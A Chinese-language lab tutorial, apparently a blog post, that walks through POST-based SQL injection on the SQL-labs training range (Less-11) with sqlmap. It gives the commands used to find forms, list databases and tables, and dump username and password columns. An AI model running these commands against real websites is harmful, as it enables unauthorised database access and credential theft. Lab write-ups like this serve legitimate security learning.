本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
序言:本文主要讲解基于SQL labs靶场,sqlmap工具进行的post传参方式的SQL注入。
传参方式有两类,一类是直接在url栏内进行url编码后进行的传参,这种传参方式保密性不强,容易被修改;另一类则是url栏内部无显示,传参保密性较强。
一,抓包。(SQL labs-less11)

使用任意抓包软件进行抓包。

发现传参方式确实为POST形式。
二,sqlmap使用。
sqlmap -u http://172.168.10.129:8001/Less-11/ --forms

使用 sqlmap 的 --forms 参数自动搜索表单(在sqlmap使用过程中,会有很多选项,全部选择y确认)。
三,选择注入点。
此处说明有多个注入点,请选择一个进行注入,此处选择0。
失败了,重新编辑,加入--dbs参数。
sqlmap -u http://172.168.10.129:8001/Less-11/ --forms --dbs

成功。
四,得到表名。
sqlmap -u http://172.168.10.129:8001/Less-11/ --forms -D 'security' --tables

五,得到字段名。
六,得到敏感信息。
sqlmap -u http://172.168.10.129:8001/Less-11/ --forms -D 'security' -T users -C passwrd,username --dump
但这里显示都是空的。
七,总结。
post与get传参并无明显差别,工具使用大同小异,手工post注入与get并无明显差别。下一篇文章将会讲解SQL注入-post手工注入。